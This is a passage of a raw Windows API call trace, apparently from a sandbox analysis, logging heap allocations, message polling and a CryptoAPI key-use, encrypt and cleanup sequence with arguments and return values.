returned 0x7da278 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.843] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da238, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da238*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.843] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.843] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.843] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.843] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.843] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.843] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.843] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.843] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.843] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0031.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.843] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.843] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.843] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.843] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.843] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.843] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.843] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.843] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0031.843] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.844] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.844] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.844] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.844] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.844] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.844] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.845] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.845] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x17922, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x17930) returned 1 [0031.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.845] CharLowerBuffW (in: lpsz="byte[96561]", cchLength=0xb | out: lpsz="byte[96561]") returned 0xb [0031.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.847] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.847] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.847] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8d6b40*, pdwDataLen=0x6ae220*=0x17922, dwBufLen=0x17930 | out: pbData=0x8d6b40*, pdwDataLen=0x6ae220*=0x17930) returned 1 [0031.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.848] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.848] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.848] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.848] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.848] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.848] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.849] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.849] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.849] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.856] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.856] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.856] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.859] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.859] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.859] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.860] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.860] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.860] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0031.864] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.864] CryptDestroyKey (hKey=0x7c2200) returned 1 [0031.864] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.864] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.864] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0031.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.864] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.864] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.864] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.864] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.864] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.864] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.864] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0031.864] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.864] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.865] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.865] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.865] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.865] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.865] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.865] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.865] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.865] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.865] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.865] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0031.865] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.865] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.865] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0031.865] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.865] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0031.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0031.865] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.866] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.866] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0031.866] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.866] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.866] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.866] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0031.866] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.866] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, 